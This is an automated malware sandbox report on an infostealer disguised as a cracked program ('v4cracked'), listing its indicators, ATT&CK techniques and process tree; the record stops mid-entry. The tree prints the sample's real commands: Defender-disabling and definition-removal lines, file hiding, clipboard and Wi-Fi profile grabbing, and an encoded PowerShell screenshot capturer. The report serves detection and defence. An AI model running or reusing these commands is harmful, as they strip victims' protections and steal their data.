2767cfb1873c6b6585458babb7ad884b62a5326d441bfd83c3db8e91d2b20fd5

Resubmissions

22/08/2023, 02:18 UTC

230822-crmytabb7y 8

22/08/2023, 02:17 UTC

230822-cqynxshe49 10

22/08/2023, 02:12 UTC

230822-cm1n4sbb5t 8

Analysis

max time kernel
129s
max time network
138s
platform
windows10-1703_x64
resource
win10-20230703-en
resource tags

arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system
submitted
22/08/2023, 02:17 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

v4cracked.zip
Size

13.9MB
MD5

2eb8a7f42774bc68fee1ed90458ff406
SHA1

830c182da95794972bb4306e884eb799babaa99b
SHA256

2767cfb1873c6b6585458babb7ad884b62a5326d441bfd83c3db8e91d2b20fd5
SHA512

9b9a23386a17b97bbfbb6be6b6e74aef89c81ce6a5408fe20dad506cde6fafbe17f72ad36f5dedc4a990b0e3b0379d9d426a3915c691ced1f0172b6369a84126
SSDEEP

196608:eCQsGbT/9bvLz3S1bA329Oq5UWrlwsGUZ:/GbTlj3S1bO29Oq5UWpwsGUZ

Score

10^/10

evasion spyware upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
5028	MpCmdRun.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	v4cracked by trigga8694.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Executes dropped EXE 1 IoCs

pid	Process
1576	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3212	v4cracked by trigga8694.exe
3212	v4cracked by trigga8694.exe
3212	v4cracked by trigga8694.exe
3212	v4cracked by trigga8694.exe
3212	v4cracked by trigga8694.exe
3212	v4cracked by trigga8694.exe
3212	v4cracked by trigga8694.exe
3212	v4cracked by trigga8694.exe
3212	v4cracked by trigga8694.exe
3212	v4cracked by trigga8694.exe
3212	v4cracked by trigga8694.exe
3212	v4cracked by trigga8694.exe
3212	v4cracked by trigga8694.exe
3212	v4cracked by trigga8694.exe
3212	v4cracked by trigga8694.exe
3212	v4cracked by trigga8694.exe
3212	v4cracked by trigga8694.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000600000001b047-146.dat	upx
behavioral1/files/0x000600000001b047-147.dat	upx
behavioral1/memory/3212-149-0x00007FFBA94B0000-0x00007FFBA9A99000-memory.dmp	upx
behavioral1/files/0x000600000001b04b-152.dat	upx
behavioral1/files/0x000600000001b04b-153.dat	upx
behavioral1/memory/3212-154-0x00007FFBBC050000-0x00007FFBBC060000-memory.dmp	upx
behavioral1/files/0x000600000001b03c-155.dat	upx
behavioral1/files/0x000600000001b03c-156.dat	upx
behavioral1/memory/3212-158-0x00007FFBB8C90000-0x00007FFBB8CB3000-memory.dmp	upx
behavioral1/files/0x000600000001b045-157.dat	upx
behavioral1/files/0x000600000001b045-159.dat	upx
behavioral1/memory/3212-160-0x00007FFBB9A50000-0x00007FFBB9A5F000-memory.dmp	upx
behavioral1/files/0x000600000001b03f-166.dat	upx
behavioral1/files/0x000600000001b03f-167.dat	upx
behavioral1/memory/3212-168-0x00007FFBB8C60000-0x00007FFBB8C8D000-memory.dmp	upx
behavioral1/files/0x000600000001b03b-169.dat	upx
behavioral1/files/0x000600000001b03b-170.dat	upx
behavioral1/files/0x000600000001b042-173.dat	upx
behavioral1/files/0x000600000001b042-172.dat	upx
behavioral1/memory/3212-175-0x00007FFBB7A30000-0x00007FFBB7A53000-memory.dmp	upx
behavioral1/memory/3212-171-0x00007FFBB8C40000-0x00007FFBB8C59000-memory.dmp	upx
behavioral1/files/0x000600000001b04a-174.dat	upx
behavioral1/files/0x000600000001b04a-176.dat	upx
behavioral1/memory/3212-177-0x00007FFBA91F0000-0x00007FFBA9367000-memory.dmp	upx
behavioral1/files/0x000600000001b041-179.dat	upx
behavioral1/files/0x000600000001b041-178.dat	upx
behavioral1/files/0x000600000001b049-180.dat	upx
behavioral1/files/0x000600000001b049-181.dat	upx
behavioral1/files/0x000600000001b043-184.dat	upx
behavioral1/files/0x000600000001b043-183.dat	upx
behavioral1/files/0x000600000001b044-185.dat	upx
behavioral1/files/0x000600000001b044-187.dat	upx
behavioral1/memory/3212-182-0x00007FFBB7A10000-0x00007FFBB7A29000-memory.dmp	upx
behavioral1/files/0x000600000001b046-186.dat	upx
behavioral1/files/0x000600000001b046-188.dat	upx
behavioral1/memory/3212-190-0x00007FFBB7920000-0x00007FFBB79D8000-memory.dmp	upx
behavioral1/memory/3212-191-0x00007FFBB8C30000-0x00007FFBB8C3D000-memory.dmp	upx
behavioral1/memory/3212-192-0x00007FFBB79E0000-0x00007FFBB7A0E000-memory.dmp	upx
behavioral1/memory/3212-189-0x00007FFBA8E70000-0x00007FFBA91E8000-memory.dmp	upx
behavioral1/memory/3212-193-0x00007FFBA94B0000-0x00007FFBA9A99000-memory.dmp	upx
behavioral1/files/0x000600000001b03e-194.dat	upx
behavioral1/memory/3212-200-0x00007FFBBC050000-0x00007FFBBC060000-memory.dmp	upx
behavioral1/memory/3212-201-0x00007FFBB78F0000-0x00007FFBB78FD000-memory.dmp	upx
behavioral1/files/0x000600000001b040-198.dat	upx
behavioral1/files/0x000600000001b040-197.dat	upx
behavioral1/memory/3212-196-0x00007FFBB7900000-0x00007FFBB7914000-memory.dmp	upx
behavioral1/files/0x000600000001b03e-195.dat	upx
behavioral1/files/0x000600000001b04c-199.dat	upx
behavioral1/files/0x000600000001b04c-202.dat	upx
behavioral1/memory/3212-203-0x00007FFBB8C90000-0x00007FFBB8CB3000-memory.dmp	upx
behavioral1/memory/3212-204-0x00007FFBA8D50000-0x00007FFBA8E6C000-memory.dmp	upx
behavioral1/memory/3212-220-0x00007FFBB8C60000-0x00007FFBB8C8D000-memory.dmp	upx
behavioral1/memory/3212-285-0x00007FFBB7A30000-0x00007FFBB7A53000-memory.dmp	upx
behavioral1/memory/3212-303-0x00007FFBA91F0000-0x00007FFBA9367000-memory.dmp	upx
behavioral1/memory/3212-305-0x00007FFBB7A10000-0x00007FFBB7A29000-memory.dmp	upx
behavioral1/memory/3212-315-0x00007FFBB7920000-0x00007FFBB79D8000-memory.dmp	upx
behavioral1/memory/3212-311-0x00007FFBA8E70000-0x00007FFBA91E8000-memory.dmp	upx
behavioral1/memory/3212-325-0x00007FFBB79E0000-0x00007FFBB7A0E000-memory.dmp	upx
behavioral1/memory/3212-329-0x00007FFBB7900000-0x00007FFBB7914000-memory.dmp	upx
behavioral1/memory/3212-392-0x00007FFBA8D50000-0x00007FFBA8E6C000-memory.dmp	upx
behavioral1/memory/3212-408-0x00007FFBA94B0000-0x00007FFBA9A99000-memory.dmp	upx
behavioral1/memory/3212-414-0x00007FFBB8C90000-0x00007FFBB8CB3000-memory.dmp	upx
behavioral1/memory/3212-589-0x00007FFBA94B0000-0x00007FFBA9A99000-memory.dmp	upx
behavioral1/memory/3212-594-0x00007FFBB8C90000-0x00007FFBB8CB3000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3036	WMIC.exe

Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery

T1057

pid	Process
4188	tasklist.exe
5000	tasklist.exe
3464	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4412	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2448	PING.EXE

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
3716	powershell.exe
1256	powershell.exe
3716	powershell.exe
3716	powershell.exe
3716	powershell.exe
1256	powershell.exe
1256	powershell.exe
1256	powershell.exe
824	powershell.exe
824	powershell.exe
3712	powershell.exe
3712	powershell.exe
824	powershell.exe
3712	powershell.exe
824	powershell.exe
3712	powershell.exe
4304	powershell.exe
4304	powershell.exe
4304	powershell.exe
4848	powershell.exe
4848	powershell.exe
4848	powershell.exe
4744	powershell.exe
4744	powershell.exe
4744	powershell.exe
4168	powershell.exe
4168	powershell.exe
4168	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	1256	powershell.exe
Token: SeDebugPrivilege	4188	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4744	WMIC.exe
Token: SeSecurityPrivilege	4744	WMIC.exe
Token: SeTakeOwnershipPrivilege	4744	WMIC.exe
Token: SeLoadDriverPrivilege	4744	WMIC.exe
Token: SeSystemProfilePrivilege	4744	WMIC.exe
Token: SeSystemtimePrivilege	4744	WMIC.exe
Token: SeProfSingleProcessPrivilege	4744	WMIC.exe
Token: SeIncBasePriorityPrivilege	4744	WMIC.exe
Token: SeCreatePagefilePrivilege	4744	WMIC.exe
Token: SeBackupPrivilege	4744	WMIC.exe
Token: SeRestorePrivilege	4744	WMIC.exe
Token: SeShutdownPrivilege	4744	WMIC.exe
Token: SeDebugPrivilege	4744	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4744	WMIC.exe
Token: SeRemoteShutdownPrivilege	4744	WMIC.exe
Token: SeUndockPrivilege	4744	WMIC.exe
Token: SeManageVolumePrivilege	4744	WMIC.exe
Token: 33	4744	WMIC.exe
Token: 34	4744	WMIC.exe
Token: 35	4744	WMIC.exe
Token: 36	4744	WMIC.exe
Token: SeDebugPrivilege	5000	tasklist.exe
Token: SeDebugPrivilege	824	powershell.exe
Token: SeIncreaseQuotaPrivilege	4744	WMIC.exe
Token: SeSecurityPrivilege	4744	WMIC.exe
Token: SeTakeOwnershipPrivilege	4744	WMIC.exe
Token: SeLoadDriverPrivilege	4744	WMIC.exe
Token: SeSystemProfilePrivilege	4744	WMIC.exe
Token: SeSystemtimePrivilege	4744	WMIC.exe
Token: SeProfSingleProcessPrivilege	4744	WMIC.exe
Token: SeIncBasePriorityPrivilege	4744	WMIC.exe
Token: SeCreatePagefilePrivilege	4744	WMIC.exe
Token: SeBackupPrivilege	4744	WMIC.exe
Token: SeRestorePrivilege	4744	WMIC.exe
Token: SeShutdownPrivilege	4744	WMIC.exe
Token: SeDebugPrivilege	4744	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4744	WMIC.exe
Token: SeRemoteShutdownPrivilege	4744	WMIC.exe
Token: SeUndockPrivilege	4744	WMIC.exe
Token: SeManageVolumePrivilege	4744	WMIC.exe
Token: 33	4744	WMIC.exe
Token: 34	4744	WMIC.exe
Token: 35	4744	WMIC.exe
Token: 36	4744	WMIC.exe
Token: SeDebugPrivilege	3712	powershell.exe
Token: SeIncreaseQuotaPrivilege	3716	powershell.exe
Token: SeSecurityPrivilege	3716	powershell.exe
Token: SeTakeOwnershipPrivilege	3716	powershell.exe
Token: SeLoadDriverPrivilege	3716	powershell.exe
Token: SeSystemProfilePrivilege	3716	powershell.exe
Token: SeSystemtimePrivilege	3716	powershell.exe
Token: SeProfSingleProcessPrivilege	3716	powershell.exe
Token: SeIncBasePriorityPrivilege	3716	powershell.exe
Token: SeCreatePagefilePrivilege	3716	powershell.exe
Token: SeBackupPrivilege	3716	powershell.exe
Token: SeRestorePrivilege	3716	powershell.exe
Token: SeShutdownPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeSystemEnvironmentPrivilege	3716	powershell.exe
Token: SeRemoteShutdownPrivilege	3716	powershell.exe
Token: SeUndockPrivilege	3716	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4428 wrote to memory of 3212	4428	v4cracked by trigga8694.exe	76
PID 4428 wrote to memory of 3212	4428	v4cracked by trigga8694.exe	76
PID 3212 wrote to memory of 372	3212	v4cracked by trigga8694.exe	84
PID 3212 wrote to memory of 372	3212	v4cracked by trigga8694.exe	84
PID 3212 wrote to memory of 2108	3212	v4cracked by trigga8694.exe	83
PID 3212 wrote to memory of 2108	3212	v4cracked by trigga8694.exe	83
PID 3212 wrote to memory of 2132	3212	v4cracked by trigga8694.exe	82
PID 3212 wrote to memory of 2132	3212	v4cracked by trigga8694.exe	82
PID 3212 wrote to memory of 4624	3212	v4cracked by trigga8694.exe	81
PID 3212 wrote to memory of 4624	3212	v4cracked by trigga8694.exe	81
PID 4624 wrote to memory of 2092	4624	cmd.exe	85
PID 4624 wrote to memory of 2092	4624	cmd.exe	85
PID 2132 wrote to memory of 4692	2132	cmd.exe	87
PID 2132 wrote to memory of 4692	2132	cmd.exe	87
PID 372 wrote to memory of 3716	372	cmd.exe	86
PID 372 wrote to memory of 3716	372	cmd.exe	86
PID 2108 wrote to memory of 1256	2108	cmd.exe	88
PID 2108 wrote to memory of 1256	2108	cmd.exe	88
PID 3212 wrote to memory of 168	3212	v4cracked by trigga8694.exe	89
PID 3212 wrote to memory of 168	3212	v4cracked by trigga8694.exe	89
PID 168 wrote to memory of 4188	168	cmd.exe	91
PID 168 wrote to memory of 4188	168	cmd.exe	91
PID 3212 wrote to memory of 4460	3212	v4cracked by trigga8694.exe	92
PID 3212 wrote to memory of 4460	3212	v4cracked by trigga8694.exe	92
PID 3212 wrote to memory of 2760	3212	v4cracked by trigga8694.exe	93
PID 3212 wrote to memory of 2760	3212	v4cracked by trigga8694.exe	93
PID 3212 wrote to memory of 4176	3212	v4cracked by trigga8694.exe	94
PID 3212 wrote to memory of 4176	3212	v4cracked by trigga8694.exe	94
PID 3212 wrote to memory of 4008	3212	v4cracked by trigga8694.exe	154
PID 3212 wrote to memory of 4008	3212	v4cracked by trigga8694.exe	154
PID 3212 wrote to memory of 1588	3212	v4cracked by trigga8694.exe	97
PID 3212 wrote to memory of 1588	3212	v4cracked by trigga8694.exe	97
PID 3212 wrote to memory of 4572	3212	v4cracked by trigga8694.exe	105
PID 3212 wrote to memory of 4572	3212	v4cracked by trigga8694.exe	105
PID 3212 wrote to memory of 2060	3212	v4cracked by trigga8694.exe	103
PID 3212 wrote to memory of 2060	3212	v4cracked by trigga8694.exe	103
PID 3212 wrote to memory of 5040	3212	v4cracked by trigga8694.exe	100
PID 3212 wrote to memory of 5040	3212	v4cracked by trigga8694.exe	100
PID 2760 wrote to memory of 824	2760	cmd.exe	110
PID 2760 wrote to memory of 824	2760	cmd.exe	110
PID 4460 wrote to memory of 4744	4460	cmd.exe	109
PID 4460 wrote to memory of 4744	4460	cmd.exe	109
PID 4008 wrote to memory of 1376	4008	cmd.exe	111
PID 4008 wrote to memory of 1376	4008	cmd.exe	111
PID 1588 wrote to memory of 756	1588	cmd.exe	112
PID 1588 wrote to memory of 756	1588	cmd.exe	112
PID 4176 wrote to memory of 5000	4176	cmd.exe	113
PID 4176 wrote to memory of 5000	4176	cmd.exe	113
PID 4572 wrote to memory of 4412	4572	cmd.exe	114
PID 4572 wrote to memory of 4412	4572	cmd.exe	114
PID 2060 wrote to memory of 1064	2060	cmd.exe	115
PID 2060 wrote to memory of 1064	2060	cmd.exe	115
PID 5040 wrote to memory of 3712	5040	cmd.exe	116
PID 5040 wrote to memory of 3712	5040	cmd.exe	116
PID 3212 wrote to memory of 4304	3212	v4cracked by trigga8694.exe	150
PID 3212 wrote to memory of 4304	3212	v4cracked by trigga8694.exe	150
PID 4304 wrote to memory of 2320	4304	powershell.exe	119
PID 4304 wrote to memory of 2320	4304	powershell.exe	119
PID 3212 wrote to memory of 2152	3212	v4cracked by trigga8694.exe	120
PID 3212 wrote to memory of 2152	3212	v4cracked by trigga8694.exe	120
PID 3212 wrote to memory of 5076	3212	v4cracked by trigga8694.exe	139
PID 3212 wrote to memory of 5076	3212	v4cracked by trigga8694.exe	139
PID 5076 wrote to memory of 292	5076	tree.com	125
PID 5076 wrote to memory of 292	5076	tree.com	125

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2092	attrib.exe
292	attrib.exe
4448	attrib.exe

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\v4cracked.zip
1⤵
PID:1588

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4424

C:\Users\Admin\Desktop\v4cracked\v4cracked by trigga8694.exe
"C:\Users\Admin\Desktop\v4cracked\v4cracked by trigga8694.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4428
- C:\Users\Admin\Desktop\v4cracked\v4cracked by trigga8694.exe
  "C:\Users\Admin\Desktop\v4cracked\v4cracked by trigga8694.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Desktop\v4cracked\v4cracked by trigga8694.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4624
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\Desktop\v4cracked\v4cracked by trigga8694.exe"
      4⤵
      Views/modifies file attributes
      PID:2092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('outdated', 0, 'error 10000a34e', 48+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2132
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('outdated', 0, 'error 10000a34e', 48+16);close()"
      4⤵
      PID:4692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2108
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1256
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:5028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\v4cracked\v4cracked by trigga8694.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:372
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\v4cracked\v4cracked by trigga8694.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:168
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4460
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2760
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4176
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1588
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5040
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
